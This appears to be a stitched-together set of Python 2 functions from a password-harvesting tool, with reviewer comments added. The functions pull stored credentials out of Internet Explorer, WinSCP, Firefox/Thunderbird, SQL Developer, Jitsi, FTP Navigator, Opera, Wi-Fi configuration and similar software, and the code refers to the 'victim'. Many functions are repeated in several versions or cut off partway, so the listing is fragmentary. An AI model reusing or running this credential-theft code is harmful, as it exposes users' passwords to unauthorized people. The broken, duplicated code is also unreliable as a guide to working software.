    :param key_algorithm: Algorithm of the key; "RSA" selects RSA, any other
                          value is handled as DSA
    :return: True only if the key can be successfully loaded and is usable
    """
    state = False
    try:
        # Try to load it without a passphrase
        if key_algorithm == "RSA":
            key = RSA.importKey(key_content_encoded)
        else:
            key = DSA.importKey(key_content_encoded)
        # Usable means: an object came back, it can sign and it holds the private part.
        state = (key is not None and key.can_sign() and key.has_private())
    except Exception as e:
        print_debug("ERROR", "Cannot validate key protection '%s'" % e)
        state = False
        pass

    return state
def run(self, historic=''):
    """Match Internet Explorer's stored form credentials against known URLs.

    Value names under ``IntelliForms\\Storage2`` are compared (first 40
    characters, lower-cased) with the hashes produced by
    ``self.get_hash_table``; on a match the value data is passed to
    ``self.decipher_password`` together with the URL bytes.

    :param historic: Optional path of a text file with one extra URL per line.
    """
    # print title
    Header().title_debug('Internet Explorer')

    # write the binary file
    try:
        self.write_binary_file()
    except:
        # NOTE(review): bare except; execution continues without the helper file.
        print_debug('ERROR', '%s cannot be created, check your file permission' % dll_name)

    # NOTE(review): 'list' shadows the builtin for the rest of the function.
    list = []
    if historic:
        if os.path.exists(historic):
            # NOTE(review): the file object is never closed.
            f = open(historic, 'r')
            for line in f:
                list.append(line.strip())
        else:
            print_debug('WARNING', 'The text file %s does not exist' % historic)

    # retrieve the urls from the history
    hash_tables = self.get_hash_table(list)

    # open the registry
    accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    keyPath = 'Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2'
    failed = False
    try:
        hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
    except:
        failed = True

    nb_site = 0
    nb_pass_found = 0
    if failed == False:
        # Index [1] of RegQueryInfoKey is the number of values.
        num = win32api.RegQueryInfoKey(hkey)[1]
        for x in range(0, num):
            k = win32api.RegEnumValue(hkey, x)
            if k:
                nb_site +=1
                for h in hash_tables:
                    # The value name starts with the URL hash: a match identifies
                    # the URL needed to decipher this entry.
                    if h[1] == k[0][:40].lower():
                        nb_pass_found += 1
                        cipher_text = k[1]
                        self.decipher_password(cipher_text, h[0])
                        break

        # print the results
        # NOTE(review): 'pwdFound' is not defined anywhere in this function;
        # unless it is a module-level name this line raises NameError.
        print_output("Internet Explorer", pwdFound)

        # manage errors
        if nb_site == 0:
            print_debug('INFO', 'No credentials stored in the IE browser.')
        elif nb_site > nb_pass_found:
            print_debug('ERROR', '%s hashes have not been decrypted, the associate website used to decrypt the passwords has not been found' % str(nb_site - nb_pass_found))
    else:
        print_debug('INFO', 'No password stored.\nThe registry key storing the ie password has not been found.\nKey: %s' % keyPath)
def check_winscp_installed(self):
    """Tell whether WinSCP's ``Configuration\\Security`` key exists for the current user.

    :return: ``True`` if the key can be opened for reading, ``False``
             otherwise (the error is logged at DEBUG level).
    """
    read_mask = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    try:
        hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Configuration\Security', 0, read_mask)
    except Exception as err:
        print_debug('DEBUG', '{0}'.format(err))
        return False
    return True
def initialize_libnss(self, list_libnss, profile):
    """Load the first NSS library from *list_libnss* that initialises on *profile*.

    Each candidate is loaded with ``CDLL`` and ``NSS_Init(profile)`` is
    called; a return value of 0 counts as success.

    :param list_libnss: Library names/paths to try, in order.
    :param profile: Profile directory passed to ``NSS_Init``.
    :return: ``True`` on the first success; ``None`` (implicitly) when every
             candidate fails.
    """
    for lib in list_libnss:
        try:
            # NOTE(review): self.libnss keeps the last library that loaded,
            # even if NSS_Init on it did not succeed.
            self.libnss = CDLL(lib)
            if self.libnss.NSS_Init(profile) == 0:
                return True
        except Exception, e:
            # A library that cannot be loaded is logged and the next one is tried.
            print_debug('DEBUG', '{0}'.format(e))
def initialize_libnss(self, list_libnss, profile):
    """Try each NSS library in turn until ``NSS_Init(profile)`` returns 0.

    :param list_libnss: Library names/paths to try, in order.
    :param profile: Profile directory passed to ``NSS_Init``.
    :return: ``True`` on the first success; falls through and returns
             ``None`` when no candidate works.
    """
    for lib in list_libnss:
        try:
            # The loaded library is stored on the instance before it is tested.
            self.libnss = CDLL(lib)
            if self.libnss.NSS_Init(profile) == 0:
                return True
        except Exception,e:
            # Load errors are logged at DEBUG level; the loop continues.
            print_debug('DEBUG', '{0}'.format(e))
def get_infos(self, path, passphrase, salt):
    """Read connection details from SQL Developer's ``connections.xml``.

    The first directory entry of *path* starting with
    'o.jdeveloper.db.connection' is appended to *path*; ``connections.xml``
    inside it is parsed. Elements carrying an ``addrType`` attribute are
    mapped into a single dict; the 'password' entry is passed through
    ``self.decrypt(salt, text, passphrase)``. Results go to ``print_output``.

    NOTE(review): one ``values`` dict is shared by the whole file, so when
    several connections are stored, later ones overwrite earlier ones and a
    single entry is reported.
    """
    for p in os.listdir(path):
        if p.startswith('o.jdeveloper.db.connection'):
            path += os.sep + p
            break

    xml_file = path + os.sep + 'connections.xml'

    if os.path.exists(xml_file):
        tree = ET.ElementTree(file=xml_file)
        pwdFound = []
        values = {}
        for elem in tree.iter():
            if 'addrType' in elem.attrib.keys():
                # For every recognised addrType, the text of the last child wins.
                if elem.attrib['addrType'] == 'sid':
                    for e in elem.getchildren():
                        values['sid'] = e.text

                elif elem.attrib['addrType'] == 'port':
                    for e in elem.getchildren():
                        values['port'] = e.text

                elif elem.attrib['addrType'] == 'user':
                    for e in elem.getchildren():
                        values['user'] = e.text

                elif elem.attrib['addrType'] == 'ConnName':
                    for e in elem.getchildren():
                        values['Connection Name'] = e.text

                elif elem.attrib['addrType'] == 'customUrl':
                    for e in elem.getchildren():
                        values['custom Url'] = e.text

                elif elem.attrib['addrType'] == 'SavePassword':
                    for e in elem.getchildren():
                        values['SavePassword'] = e.text

                elif elem.attrib['addrType'] == 'hostname':
                    for e in elem.getchildren():
                        values['hostname'] = e.text

                elif elem.attrib['addrType'] == 'password':
                    for e in elem.getchildren():
                        pwd = self.decrypt(salt, e.text, passphrase)
                        values['password'] = pwd

                elif elem.attrib['addrType'] == 'driver':
                    for e in elem.getchildren():
                        values['driver'] = e.text

        # The accumulated dict is reported even when it is empty.
        pwdFound.append(values)

        # print the results
        print_output("SQL Developer", pwdFound)
    else:
        print_debug('ERROR', 'The xml file connections.xml containing the passwords has not been found.')
def parse_file(self):
    """Open the file named by ``self.filestr`` for parsing.

    Only the opening step is visible in this listing; a failure to open is
    logged at DEBUG and INFO level.
    NOTE(review): the handler does not return, so any code after it would run
    with ``fd`` still set to ``None``.
    """
    pwdFound = []
    fd = None
    try:
        fd = open(self.filestr)
    except Exception, e:
        print_debug('DEBUG', '{0}'.format(e))
        print_debug('INFO', 'Could not open the file: %s ' % self.filestr)
def retrieve_password(self):
    """Read FTP Navigator's site list if it exists at its fixed location.

    The file is expected at ``C:\\FTP Navigator\\Ftplist.txt``; when present it
    is handed to ``self.read_file``, otherwise an INFO message is logged.
    """
    Header().title_debug('FTP Navigator')

    ftplist_file = "C:\\FTP Navigator\\Ftplist.txt"
    if not os.path.exists(ftplist_file):
        print_debug('INFO', 'Paht %s does not exist.\nFTP Navigator not installed or not found.' % ftplist_file)
        return
    self.read_file(ftplist_file)
def get_logins_info(self):
    """Open the WinSCP ``Sessions`` key under HKEY_CURRENT_USER for reading.

    Only the opening of the key is visible in this listing: on failure the
    error is logged at DEBUG level and ``False`` is returned.
    """
    accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    try:
        # NOTE(review): single backslashes in a normal string literal; this
        # works only because none of them forms a recognised escape.
        key = win32api.RegOpenKey(
            win32con.HKEY_CURRENT_USER,
            'Software\Martin Prikryl\WinSCP 2\Sessions', 0, accessRead)
    except Exception, e:
        print_debug('DEBUG', '{0}'.format(e))
        return False
def retrieve_password(self):
    """Entry point of the Jitsi module.

    ``self.get_path()`` returns either the properties file location or the
    sentinel 'JITSI_NOT_EXISTS'; the file is handed to ``self.get_info``.
    """
    Header().title_debug('Jitsi')

    properties_path = self.get_path()
    if properties_path != 'JITSI_NOT_EXISTS':
        self.get_info(properties_path)
        return
    print_debug('INFO', 'Jitsi not installed.')
def run(self):
    """Entry point of the Jitsi module.

    The sentinel 'JITSI_NOT_EXISTS' from ``self.get_path()`` means there is
    nothing to read; any other value is passed to ``self.get_info``.
    """
    Header().title_info('Jitsi')

    properties_path = self.get_path()
    if properties_path == 'JITSI_NOT_EXISTS':
        print_debug('INFO', 'Jitsi not installed.')
        return
    self.get_info(properties_path)
def run(self, historic=''):
    """Entry point of the Internet Explorer module.

    Only the first step is visible in this listing: the helper file named by
    ``dll_name`` is written with ``self.write_binary_file()``; a failure is
    logged and execution continues.

    :param historic: Not used in the visible part of the function.
    """
    # print title
    Header().title_info('Internet Explorer')

    # write the binary file
    try:
        self.write_binary_file()
    except Exception,e:
        print_debug('DEBUG', '{0}'.format(e))
        print_debug('ERROR', '%s cannot be created, check your file permission' % dll_name)
def run(self):
    """Entry point of the Puttycm module.

    Only the lookup of the database path is visible in this listing: any
    exception from ``self.get_default_database()`` is treated as "not
    installed" and ends the run.
    """
    # print title
    Header().title_info('Puttycm')

    try:
        database_path = self.get_default_database()
    except Exception, e:
        print_debug('DEBUG', '{0}'.format(e))
        print_debug('INFO', 'Puttycm not installed')
        return
def rev2self():
    """Stop impersonating and release the token handle kept in ``global_ref``.

    Calls ``RevertToSelf``, closes ``global_ref`` if it is set, resets it to
    ``None`` and logs the user name the thread now runs as.
    """
    global global_ref
    # NOTE(review): the return value of RevertToSelf is not checked; if it
    # fails, the thread keeps running under the impersonated identity.
    windll.advapi32.RevertToSelf()
    try:
        if global_ref is not None:
            windll.kernel32.CloseHandle(global_ref)
    except:
        # Bare except: a failure to close the handle is ignored.
        pass
    global_ref=None
    print_debug('INFO', 'Running as: ' + GetUserName())
def check_winscp_installed(self):
    """Report whether the current user has a WinSCP ``Configuration\\Security`` key.

    :return: ``True`` when the key opens for reading; ``False`` when opening
             raises (the exception text is logged at DEBUG level).
    """
    desired_access = (win32con.KEY_READ
                      | win32con.KEY_ENUMERATE_SUB_KEYS
                      | win32con.KEY_QUERY_VALUE)
    installed = False
    try:
        hkey = win32api.RegOpenKey(
            win32con.HKEY_CURRENT_USER,
            'Software\Martin Prikryl\WinSCP 2\Configuration\Security', 0,
            desired_access)
        installed = True
    except Exception as err:
        print_debug('DEBUG', '{0}'.format(err))
    return installed
def run(self, historic=''):
    """Entry point of the Internet Explorer module.

    Only the first step is visible in this listing: ``self.write_binary_file()``
    writes the helper file named by ``dll_name``. A failure is logged at DEBUG
    and ERROR level and does not stop the function.

    :param historic: Not used in the visible part of the function.
    """
    # print title
    Header().title_info('Internet Explorer')

    # write the binary file
    try:
        self.write_binary_file()
    except Exception, e:
        print_debug('DEBUG', '{0}'.format(e))
        print_debug(
            'ERROR',
            '%s cannot be created, check your file permission' % dll_name)
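def readBsddb(self, name):
    """Read a Berkeley DB 1.85 hash file into a dict.

    The 60-byte header is checked for the magic number 0x61561 and version 2;
    page size and key count are taken from offsets 12 and 0x38. Pages are then
    read one after another, and the byte ranges between the sorted item
    offsets of each page are collected. Consecutive items form
    (value, key) pairs.

    The file is opened in a ``with`` block so the handle is released on every
    exit path, including the two early ``return False`` cases and any
    exception raised while parsing.

    :param name: Path of the database file.
    :return: Dict mapping key bytes to value bytes, or ``False`` when the
             magic number or the version does not match.
    """
    db1 = []
    with open(name, 'rb') as f:
        # http://download.oracle.com/berkeley-db/db.1.85.tar.gz
        header = f.read(4 * 15)
        magic = self.getLongBE(header, 0)
        if magic != 0x61561:
            print_debug('WARNING', 'Bad magic number')
            return False
        version = self.getLongBE(header, 4)
        if version != 2:
            print_debug('WARNING', 'Bad version !=2 (1.85)')
            return False
        pagesize = self.getLongBE(header, 12)
        nkeys = self.getLongBE(header, 0x38)

        readkeys = 0
        page = 1
        while readkeys < nkeys:
            f.seek(pagesize * page)
            offsets = f.read((nkeys + 1) * 4 + 2)
            offsetVals = []
            i = 0
            nval = 0
            val = 1
            keys = 0
            # Walk the page's offset table until the look-ahead entry equals
            # the current value offset.
            while nval != val:
                keys += 1
                key = self.getShortLE(offsets, 2 + i)
                val = self.getShortLE(offsets, 4 + i)
                nval = self.getShortLE(offsets, 8 + i)
                offsetVals.append(key + pagesize * page)
                offsetVals.append(val + pagesize * page)
                readkeys += 1
                i += 4
            # The end of the page closes the last item.
            offsetVals.append(pagesize * (page + 1))
            valKey = sorted(offsetVals)
            for i in range(keys * 2):
                f.seek(valKey[i])
                data = f.read(valKey[i + 1] - valKey[i])
                db1.append(data)
            page += 1

    # Items alternate value, key.
    db = {}
    for i in range(0, len(db1), 2):
        db[db1[i + 1]] = db1[i]
    return db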
def run(self):
    """Entry point of the wpa_supplicant module.

    Stops early when ``self.check_file_access()`` is truthy or when the
    process is not running as uid 0; otherwise the parsed entries are handed
    to ``print_output``.
    """
    Header().title_info('Wifi (from WPA Supplicant)')

    if self.check_file_access():
        return

    # Root is required to read the configuration file.
    running_as_root = os.getuid() == 0
    if not running_as_root:
        print_debug('INFO', 'You need more privileges (run it with sudo)\n')
        return

    entries = self.parse_file()
    print_output("wpa_supplicant", entries)
def history_from_regedit(self): urls = [] # open the registry accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE keyPath = 'Software\\Microsoft\\Internet Explorer\\TypedURLs' try: hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead) except Exception, e: print_debug('DEBUG', '{0}'.format(e)) return []
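def get_path(self, software_name):
    """Return the profile root of *software_name* below ``%APPDATA%``.

    :param software_name: 'Firefox' or 'Thunderbird'.
    :return: The path string, or ``None`` when APPDATA is not set or
             *software_name* is not one of the two supported values.

    Changes against the previous version:
    * the log call now passes a level as first argument, like every other
      ``print_debug`` call;
    * an unsupported *software_name* returns ``None`` instead of failing with
      ``UnboundLocalError`` on the unassigned ``path``;
    * backslashes in the literals are doubled, so the strings no longer
      depend on ``\\M``, ``\\F``, ``\\T`` ... being unrecognised escapes (the
      runtime values are unchanged).
    """
    if 'APPDATA' not in os.environ:
        print_debug(
            'ERROR',
            'The APPDATA environment variable is not definded.\nUse the -s option and specify the folder path of the victim\nPath: <HOMEPATH>\\Application Data\\Mozilla\\Firefox\\Profiles\\<PROFILE_NAME>'
        )
        return

    appdata = str(os.environ['APPDATA'])
    if software_name == 'Firefox':
        return '%s\\Mozilla\\Firefox' % appdata
    if software_name == 'Thunderbird':
        return '%s\\Thunderbird' % appdata
    return None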
def get_hash_table(self, list):
    """Build [utf16_bytes, sha1_hex] pairs for every known URL.

    URLs from ``self.get_history()`` are concatenated with *list*. Each URL
    gets a trailing NUL, is encoded as UTF-16LE and hashed with SHA-1; the
    lower-case hex digest is stored next to the encoded bytes.

    NOTE(review): no return statement is visible in this listing, and the
    parameter name shadows the builtin ``list``.

    :param list: Additional URLs supplied by the caller.
    """
    # get the url list
    urls = self.get_history()
    urls = urls + list

    # calculate the hash for all urls found on the history
    hash_tables = []
    for u in range(len(urls)):
        try:
            h = (urls[u] + '\0').encode('UTF-16LE')
            hash_tables.append([h, hashlib.sha1(h).hexdigest().lower()])
        except Exception, e:
            # A URL that cannot be encoded is logged and skipped.
            print_debug('DEBUG', '{0}'.format(e))
def get_dic_file(self, dictionary_path):
    """Load the word list at *dictionary_path*, one word per line.

    Only the trailing newline is stripped from each line, so a '\\r' from
    Windows line endings stays part of the word.

    NOTE(review): the only return visible in this listing is the ``[]`` of
    the error path; the success path shows no ``return words``.

    :param dictionary_path: Path of the text file; a falsy value skips loading.
    """
    words = []
    if dictionary_path:
        try:
            dicFile = open (dictionary_path,'r')
        except Exception,e:
            print_debug('DEBUG', '{0}'.format(e))
            print_debug('ERROR', 'Unable to open passwords file: %s' % str(dictionary_path))
            return []

        # NOTE(review): the file is not closed if reading raises.
        for word in dicFile.readlines():
            words.append(word.strip('\n'))
        dicFile.close()
def run(self):
    """Entry point of the DbVisualizer module.

    ``self.get_mainPath()`` returns the sentinel 'DBVIS_NOT_EXISTS' when the
    application is absent; otherwise passphrase and salt are fetched and
    ``self.get_infos`` is called.
    """
    Header().title_debug('DbVisualizer')

    mainPath = self.get_mainPath()
    if mainPath == 'DBVIS_NOT_EXISTS':
        print_debug('INFO', 'DbVisualizer not installed.')
        return

    # Passphrase is fetched before the salt, as in the original call order.
    secret = self.get_passphrase()
    salt_value = self.get_salt()
    self.get_infos(mainPath, secret, salt_value)
def run(self):
    """Entry point of the Jitsi module.

    ``self.get_path()`` signals problems with the sentinels 'Error' (APPDATA
    missing) and 'JITSI_NOT_EXISTS'; any other value is the properties file
    passed to ``self.get_info``.
    """
    Header().title_info('Jitsi')

    properties_path = self.get_path()
    if properties_path == 'Error':
        print_debug('ERROR', 'The APPDATA environment variable is not defined')
        return
    if properties_path == 'JITSI_NOT_EXISTS':
        print_debug('INFO', 'Jitsi not installed.')
        return
    self.get_info(properties_path)
def masterPasswordUsed(self, path):
    """Parse ``operaprefs.ini`` under *path*, skipping leading lines that are not valid INI.

    The first line is always discarded. ``readfp`` is then retried, dropping
    one more line after each failure, until parsing succeeds. Only this
    parsing step is visible in this listing.

    NOTE(review): if the file can never be parsed, ``readline`` keeps
    returning an empty string at end of file and the loop depends on
    ``readfp`` eventually succeeding on the empty remainder; the file object
    is not closed in the visible code.
    """
    # the init file is not well defined so lines have to be removed before to parse it
    cp = RawConfigParser()
    f = open(path + os.sep + 'operaprefs.ini', 'rb')

    f.readline() # discard first line
    while 1:
        try:
            cp.readfp(f)
            break
        except Exception, e:
            print_debug('DEBUG', '{0}'.format(e))
            f.readline() # discard the next line and retry